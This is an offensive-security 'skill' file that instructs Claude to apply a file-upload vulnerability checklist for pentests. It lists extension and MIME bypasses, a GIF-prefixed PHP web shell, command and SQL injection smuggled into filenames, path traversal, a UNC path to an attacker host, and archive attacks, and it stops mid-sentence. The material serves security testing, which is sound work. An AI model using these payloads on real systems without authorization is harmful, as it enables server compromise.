SKILL: File Upload Vulnerabilities

Metadata

• Skill Name: file-upload
• Folder: offensive-file-upload
• Source: https://github.com/SnailSploit/offensive-checklist/blob/main/file-upload.md

Description

File upload vulnerability checklist: MIME type bypass, extension bypass, magic byte manipulation, path traversal in filenames, stored XSS via SVG/HTML upload, server-side processing attacks, and race conditions. Use for assessing file upload endpoints in web app pentests or bug bounty.

Trigger Phrases

Use this skill when the conversation involves any of: file upload, MIME bypass, extension bypass, magic byte, path traversal upload, SVG XSS, polyglot, upload bypass, malicious upload, web shell upload

Instructions for Claude

When this skill is active:

1. Load and apply the full methodology below as your operational checklist
2. Follow steps in order unless the user specifies otherwise
3. For each technique, consider applicability to the current target/context
4. Track which checklist items have been completed
5. Suggest next steps based on findings

Full Methodology

File Upload Vulnerabilities

Mechanisms

flowchart TD
    A[File Upload Vulnerabilities] --> B[Insufficient File Type Validation]
    A --> C[Improper Extension Handling]
    A --> D[Inadequate File Content Analysis]
    A --> E[Unsafe File Storage]
    A --> F[File Operation Mishandling]
    A --> G[Directory Traversal]
    A --> H[Race Conditions]

    B --> I[Remote Code Execution]
    C --> I
    D --> J[Client-Side Attacks]
    E --> I
    F --> K[Denial of Service]
    G --> L[Arbitrary File Access]
    H --> I

File upload vulnerabilities occur when web applications allow users to upload files without implementing proper validation, filtering, and handling mechanisms. These vulnerabilities can lead to various attacks, ranging from simple web defacement to complete server compromise through remote code execution.

The core technical issues behind file upload vulnerabilities include:

• Insufficient File Type Validation: Failure to properly validate the actual content/type of uploaded files
• Improper Extension Handling: Not restricting dangerous file extensions or allowing easy bypasses
• Inadequate File Content Analysis: Not checking the actual file content versus relying only on extension or content-type
• Unsafe File Storage: Storing files in executable directories or with dangerous permissions
• File Operation Mishandling: Not securely handling file operations during the upload process
• Directory Traversal Vulnerabilities: Allowing manipulation of upload paths
• Race Conditions: Timing issues during validation and moving of uploaded files
• Archive Extraction Flaws: Insecure handling of archive formats like ZIP or TAR (e.g., Symlink abuse, Zip Slip)

File upload vulnerabilities can manifest in various upload functionality patterns:

• Profile Picture Uploads: Common in user profiles and social media
• Document Repositories: File sharing services and document management systems
• Media Uploads: Image, video, and audio uploaders
• Bulk Import Features: CSV, XML, and other data import functionality
• Content Management Systems: Templates, plugins, themes, and media libraries

Hunt

Identifying File Upload Vulnerabilities

Target Discovery

1. Map File Upload Functionality:

   • Profile picture uploads
   • Document/attachment uploads
   • Import/export features
   • Media galleries
   • CMS admin sections
   • Backup/restore features
   • Avatar/image uploads

2. Identify Upload Processing Patterns:

   • Client-side validation patterns (JavaScript checks)
   • Server-side validation indicators
   • File type restrictions mentioned in UI
   • Error messages related to file types

3. Testing Prerequisites:

   • Collection of test files (various formats)
   • Proxy for intercepting requests (Burp Suite, ZAP)
   • Web shells for testing execution
   • MIME-type tools for manipulation
   • Containerized/sandboxed converters ready for validation (e.g., bwrap/seccomp profiles)

Testing Methodologies

1. Basic File Upload Testing:

   • Test uploading standard expected files (baseline)
   • Attempt uploading executable file types (PHP, ASP, JSP, etc.)
   • Modify content-type headers during upload
   • Change file extensions after client-side validation

2. Extension-Based Testing:

   • Test alternate extensions for web shells:

     .php, .php3, .php4, .php5, .phtml, .phar, .phpt, .pht, .phps, .php2, .php6, .php7, .inc, .shtml, .pgif
     .asp, .aspx, .ashx, .asmx, .cer, .asa
     .jsp, .jspx, .jsw, .jsv, .jspf
     .cfm, .cfml, .cfc, .dbm (Coldfusion)
     .pl, .py, .rb, .cgi
     

   • Test double extensions:

     file.jpg.php
     file.php.jpg
     file.php.jpeg
     file.php%00.jpg  # Null byte (older versions)
     file.php%20.jpg  # URL encoded space
     file.php%0d%0a.jpg # CRLF injection
     file.php.blah123jpg # If regex is weak
     

   • Test case sensitivity bypass:

     file.PhP
     file.Php5
     file.AspX
     file.pHp
     file.pHP5
     file.PhAr
     

   • Test trailing characters/delimiters:

     file.php.....
     file.php/
     file.php.\
     file.php. # Trailing dot (Windows specific)
     file.php%20 # Trailing space
     file.php%09 # Trailing tab
     file.php%0a # Trailing newline
     file.php%0d # Trailing carriage return
     file.php::$DATA # NTFS Alternate Data Stream (Windows specific)
     file. # No extension
     .html # Just extension
     

   • Test filename manipulation:

     # Try to cut extension with max filename length limit
     # Try empty filename: .php
     # Send filename parameter twice: filename="allowed.jpg";filename="shell.php"
     

3. Content-Type Testing:

   • Modify the Content-Type header to bypass MIME validation:

     Content-Type: image/jpeg  # actual file is PHP
     Content-Type: image/png   # actual file is PHP
     Content-Type: image/gif   # actual file is PHP
     Content-Type: application/x-php  # declared as image/jpeg when sent
     

   • Other Content-Type manipulations:

     # Remove Content-Type header entirely
     # Send Content-Type twice with allowed/disallowed values
     

4. Magic Byte Forging:

   • If validation relies on magic bytes, prefix the malicious file content with valid magic bytes of an allowed type.

   # Example: Add GIF header to a PHP shell
   GIF89a;<?php system($_GET['cmd']); ?>
   

5. Polyglot File Testing:

   • Create and test polyglot files (valid in multiple formats)

     GIFAR files (GIF + RAR)
     Valid Image + PHP code in EXIF metadata
     PDF + PHP code
     SVG + JavaScript for XSS
     

   • see @dan_crowley's talk and @angealbertini research

6. Path and Filename Abuse Testing:

   • Test path traversal in filename:

     filename=../../../../etc/passwd
     filename=/etc/passwd
     filename=\\attacker-site.com\file.png # UNC Path (Windows specific, may trigger SMB connection)
     

   • Test injections via filename (if filename is processed unsafely):

     filename=a$(whoami)z.png # Command Injection
     filename=a`whoami`z.png  # Command Injection
     filename="a';select+sleep(10);--z.png" # SQL Injection
     filename=https://internal.service/data # SSRF attempt
     

   • Test DoS via large filename (e.g., 255+ characters).

7. Archive Testing (Zip/Tar):

   • Zip Slip: Create archives with path traversal (../../tmp/shell.php).
   • Symlink Abuse: Include symlinks in archives pointing to sensitive files (ln -s /etc/passwd link.txt).
   • Tar Permissions Abuse: Create tar with restrictive parent dir permissions (chmod 300) but permissive subdir (chmod 700) containing syml